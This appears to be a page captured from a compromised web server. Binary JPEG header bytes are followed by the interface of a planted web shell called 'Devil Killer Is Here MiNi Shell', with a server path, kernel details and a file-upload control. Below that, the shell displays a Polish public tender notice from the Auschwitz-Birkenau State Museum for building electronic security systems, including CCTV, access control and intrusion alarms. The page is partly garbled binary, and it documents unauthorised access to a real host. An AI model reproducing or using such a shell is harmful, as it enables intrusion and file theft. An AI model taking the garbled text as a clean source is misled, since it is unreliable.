JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250429/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250429/0020979501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa Elektronicznych Systemów Zabezpieczeń w budynkach Państwowego Muzeum Auschwitz Birkenau w Oświęcimiu w podziale na 2 Części z dopuszczeniem ofert częściowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000276015</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Więźniów Oświęcimia 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oświęcim</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@auschwitz.org</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.auschwitz.org/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa Elektronicznych Systemów Zabezpieczeń w budynkach Państwowego Muzeum Auschwitz Birkenau w Oświęcimiu w podziale na 2 Części z dopuszczeniem ofert częściowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ebde234c-ee9f-4b99-ae59-3e9f11008654</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00209795</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ebde234c-ee9f-4b99-ae59-3e9f11008654 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> Zasady udostępniania dokumentacji o klauzuli „zastrzeżone” zostały opisane w dziale XXII SWZ. Ograniczenie w<br/>udostępnianiu części SWZ wynika z art. 280 ust. 3 ustawy Pzp <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja odbywa się przy użyciu platformy e-Zamówienia –<br/>https://ezamowienia.gov.pl/pl/ z tym zastrzeżeniem, że Zamawiający odstępuje od używania środków komunikacji elektronicznej tj.<br/>1) platformy e-Zamówienia oraz 2) ewentualnego adresu e-mail: przetargi@auschwitz.org (użycie adresu e-mail zostało opisane w<br/>ust. 2 – patrz niżej), w części dotyczącej dokumentacji o klauzuli zastrzeżone. Dla dokumentacji o klauzuli zastrzeżone, Zamawiający<br/>oraz Wykonawcy, zgodnie z art. 65 ust. 2 w zw. z art. 65 ust. 1 pkt 6 ustawy Pzp, zobowiązani są prowadzić korespondencję za<br/>pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. z 2023 r. poz. 1640<br/>oraz z 2024 r. poz. 467 i 1222), osobiście lub za pośrednictwem posłańca.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania zostały opisane w dziale<br/>VIII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zagadnienie RODO zostało opisane w paragrafie 29 wzoru umowy - załącznik nr 6 do<br/>SWZ, a także w dziale XXI SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa Elektronicznych Systemów Zabezpieczeń wraz z infrastrukturą towarzyszącą w budynku w B112 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45312200-9 - Instalowanie przeciwwłamaniowych systemów alarmowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-08-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień polegających na powtórzeniu robót podobnych, o których mowa w art. 214 ust.1 pkt 7 Pzp:<br/>dla Części 2: o wartości nie większej niż do 50% wartości zamówienia podstawowego dla tej Części. Zamówienie będzie polegało na<br/>powtórzeniu robót budowlanych polegających na budowie ESZ w innych budynkach muzealnych i terenie wraz z niezbędną<br/>infrastrukturą w sytuacji gdy Zamawiający uzna, że będzie to w jego interesie funkcjonalnym, a także będzie dysponował środkami<br/>finansowymi na ten cel oraz odpowiednim zespołem pracowników, który będzie mógł dedykować dla potrzeb tego zadania;.<br/>Wynagrodzenie wykonawcy za realizację zamówienia podobnego zostanie ustalone w drodze negocjacji w oparciu o wynagrodzenie<br/>określone w umowie podstawowej jako ceny wyjściowej.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie te oferty, które nie zostaną odrzucone na podstawie art. 226 ust.<br/>1 ustawy Pzp. Kryteria oceny ofert zostały opisane w dziale XIV SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas realizacji naprawy awarii krytycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa Elektronicznych Systemów Zabezpieczeń wraz z infrastrukturą towarzyszącą w budynku w A8, A9 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45312200-9 - Instalowanie przeciwwłamaniowych systemów alarmowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający<br/>przewiduje udzielenie zamówień polegających na powtórzeniu robót podobnych, o których mowa w art. 214 ust.1 pkt 7 Pzp:<br/>dla Części 2: o wartości nie większej niż do 50% wartości zamówienia podstawowego dla tej Części. Zamówienie będzie polegało na<br/>powtórzeniu robót budowlanych polegających na budowie ESZ w innych budynkach muzealnych i terenie wraz z niezbędną<br/>infrastrukturą w sytuacji gdy Zamawiający uzna, że będzie to w jego interesie funkcjonalnym, a także będzie dysponował środkami<br/>finansowymi na ten cel oraz odpowiednim zespołem pracowników, który będzie mógł dedykować dla potrzeb tego zadania.<br/>Wynagrodzenie wykonawcy za realizację zamówienia podobnego zostanie ustalone w drodze negocjacji w oparciu o wynagrodzenie<br/>określone w umowie podstawowej jako ceny wyjściowej.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie te oferty, które nie zostaną odrzucone na podstawie art. 226 ust.<br/>1 ustawy Pzp. Kryteria oceny ofert zostały opisane w dziale XIV SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas realizacji naprawy awarii krytycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3. Warunki udziału w postępowaniu określone przez Zamawiającego:<br/>UWAGA! Wykonawca ubiegający się o udzielenie zamówienia, zamierzający przetwarzać informacje niejawne o klauzuli<br/>zastrzeżone powinien spełnić wymagania Ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych.<br/>3.1. Wykonawcy ubiegający się o udzielenie zamówienia muszą być uprawnieni do wykonywania działalności gospodarczej<br/>w zakresie usług ochrony osób i mienia realizowanych w formie zabezpieczenia technicznego. W celu potwierdzenia<br/>spełnienia tego warunku Wykonawcy są zobowiązani wskazać w formularzu ofertowym (pkt 5 formularza oferty) nazwę<br/>organu, datę wydania, numer aktualnej koncesji o której mowa w ustawie z dnia 22 sierpnia 1997 r. o ochronie osób i<br/>mienia.<br/>3.2. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy dla danej Części przedsięwzięcia tj. Części 1<br/>lub Części 2 spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej (poniższe warunki<br/>udziału są takie same dla każdej Części):<br/>3.2.1. W zakresie doświadczenia wykonawców - muszą posiadać niezbędną wiedzę i doświadczenie w postaci wykonanej z<br/>należytą starannością w okresie 7 lat przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej jednej z każdej z wymienionych poniżej<br/>realizacji elektronicznych systemów zabezpieczeń:<br/>3.2.1.1. Systemu CCTV w technologii IP składającego się z co najmniej 5 punktów kamerowych z rejestracją obrazu i<br/>analityką o wartości nie mniejszej niż 20 000,00 zł brutto;<br/>3.2.1.2. Systemu Kontroli Dostępu obsługującego co najmniej 5 przejść w obrębie jednego budynku zintegrowanego z<br/>systemem Sygnalizacji Włamania i Napadu o wartości nie mniejszej niż 50 000,00 zł brutto;<br/>3.2.1.3. Systemu Sygnalizacji Włamania i Napadu opartego na centrali spełniającej wymagania Grade 3 składającego się z<br/>minimum 50 czujników różnego rodzaju i 5 stref dozorowych o wartości nie mniejszej niż 50 000,00 zł brutto;<br/>3.2.1.4. Co najmniej jedną usługę serwisową systemów bezpieczeństwa w trybie 24/7/360 trwającą nieprzerwanie minimum<br/>2 lata;<br/>3.2.1.5. Wykonanie dowolnego systemu ESZ na obiekcie wpisanym do rejestru zabytków lub innego właściwego rejestru lub<br/>inwentarza muzeum będącego instytucją kultury*.<br/>*Przez inny właściwy rejestr (ze względu na miejsce położenia zabytku), Zamawiający rozumie każdy, tak w Europie jak i na<br/>świecie rejestr bądź wykaz lub ewidencję zabytków będący odpowiednikiem rejestru zabytków w rozumieniu ustawy z dnia<br/>23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami .<br/>3.2.2. W zakresie osób skierowanych przez wykonawców do realizacji zamówienia dla każdej Części - muszą dysponować<br/>osobami zdolnymi do wykonania zamówienia w postaci zespołu osób zdolnych do wykonania zamówienia składającego się<br/>co najmniej z:<br/>3.2.2.1. Osoby pełniącej funkcję kierownika budowy spełniającej poniższe warunki:<br/>3.2.2.1.1. Musi posiadać uprawnienia budowlane określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane do<br/>kierowania robotami budowlanymi specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych;<br/>3.2.2.1.2. Musi być wpisany na listę członków właściwej izby samorządu zawodowego;<br/>3.2.2.1.3. Musi posiadać doświadczenie wyrażające się co najmniej 18-miesięcznym udziałem w robotach budowlanych<br/>prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury<br/>zgodnie z art.37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami;<br/>3.2.2.1.4. Musi posiadać, co najmniej 24-miesięczne doświadczenie w pełnieniu funkcji kierownika robót lub kierownika<br/>budowy liczone po uzyskaniu uprawnień budowlanych;<br/>3.2.2.1.5. Pisemne upoważnienie do dostępu do informacji niejawnych o klauzuli zastrzeżone lub poświadczenie<br/>bezpieczeństwa uprawniające do dostępu do informacji niejawnych do klauzuli minimum zastrzeżone, zgodnie z wymogami<br/>określonymi w art. 21 ustawy o ochronie informacji niejawnych wraz z aktualnymi zaświadczeniami o odbyciu szkolenia w<br/>zakresie ochrony informacji niejawnych – kopie poświadczone za zgodność z oryginałem.<br/>3.2.2.1.6. Funkcję kierownika budowy może także wykonywać osoba, której odpowiednie kwalifikacje zawodowe zostały<br/>uznane na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej;<br/>3.2.2.1.7. W odniesieniu do kierownika budowy właściwe są uprawnienia budowlane wydawane po 1994 roku zgodnie z<br/>przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadające im, ważne uprawnienia budowlane wydane<br/>na podstawie obowiązujących wcześniej właściwych przepisów.<br/>3.2.2.2. Osobę pełniącą funkcję Główny Instalator ESZ posiadającego:<br/>3.2.2.2.1. Doświadczenie w postaci udziału w realizacji, nabyte w okresie ostatnich trzech lat przed upływem składania ofert,<br/>co najmniej dwóch projektów polegających na dostarczeniu, zainstalowaniu i uruchomieniu zintegrowanego systemu<br/>bezpieczeństwa o wartości nie niższej niż 250 000 zł brutto każda;<br/>3.2.2.2.2. Wpis na listę kwalifikowanych pracowników zabezpieczenia technicznego;<br/>3.2.2.2.3. Pisemne upoważnienie do dostępu do informacji niejawnych o klauzuli zastrzeżone lub poświadczenie<br/>bezpieczeństwa uprawniające do dostępu do informacji niejawnych do klauzuli minimum zastrzeżone, zgodnie z wymogami<br/>określonymi w art. 21 ustawy o ochronie informacji niejawnych wraz z aktualnymi zaświadczeniami o odbyciu szkolenia w<br/>zakresie ochrony informacji niejawnych – kopie poświadczone za zgodność z oryginałem;<br/>3.2.2.2.4. Potwierdzenie producenta lub autoryzowanego dystrybutora urządzeń użytych do realizacji zamówienia o<br/>posiadaniu uprawnień do montażu, obsługi i konserwacji oferowanych systemów w tym urządzeń sieciowych;<br/>3.2.2.2.5. Uprawnienia elektryczne typu SEP G1 w zakresie dozoru i eksploatacji.<br/>3.2.2.3. Co najmniej dwie osoby pełniące funkcję Instalatorów posiadających:<br/>3.2.2.3.1. Wpis na listę kwalifikowanych pracowników zabezpieczenia technicznego;<br/>3.2.2.3.2. Doświadczenie przy instalacji elektronicznych systemów bezpieczeństwa nabyte w okresie ostatnich trzech lat<br/>przed upływem składania ofert;<br/>3.2.2.3.3. Pisemne upoważnienie do dostępu do informacji niejawnych o klauzuli zastrzeżone lub poświadczenie<br/>bezpieczeństwa uprawniające do dostępu do informacji niejawnych do klauzuli minimum zastrzeżone, zgodnie z wymogami<br/>określonymi w art. 21 ustawy o ochronie informacji niejawnych wraz z aktualnymi zaświadczeniami o odbyciu szkolenia w<br/>zakresie ochrony informacji niejawnych – kopie poświadczone za zgodność z oryginałem;<br/>3.2.2.3.4. Potwierdzenie producenta lub autoryzowanego dystrybutora urządzeń użytych do realizacji zamówienia o<br/>posiadaniu uprawnień do montażu, obsługi i konserwacji oferowanych systemów w tym urządzeń sieciowych;<br/>3.2.2.3.5. Uprawnienia elektryczne typu SEP G1 w zakresie dozoru i eksploatacji.<br/>3.2.2.4. Koordynatora w postaci kierownika robót / majstra obecnego w każdym dniu realizacji robót budowlanych który<br/>będzie odpowiadał za organizację, koordynację i prowadzenie prac;<br/>3.2.2.5. osobę posiadającą ważną autoryzację (certyfikat) firmy Esser by Honeywell dotyczący uprawnień do montażu<br/>Systemu Sygnalizacji Pożaru.<br/>3.2.3. W zakresie sytuacji ekonomicznej i finansowej - Posiadanie sytuacji ekonomicznej lub finansowej zapewniającej<br/>wykonanie zamówienia wyrażającej się dysponowaniem środkami lub posiadaniem zdolności kredytowej w wysokości nie<br/>mniejszej niż 250.000,00 PLN. Wartości podane w walutach innych niż PLN należy przeliczyć na PLN wg średniego kursu<br/>NBP (tabela A) z dnia wystawienia dokumentu potwierdzającego posiadane środki finansowe lub zdolność kredytową. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie przewiduje, z wyjątkiem oświadczenia z art. 125 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie przewiduje, z wyjątkiem oświadczenia z art. 125 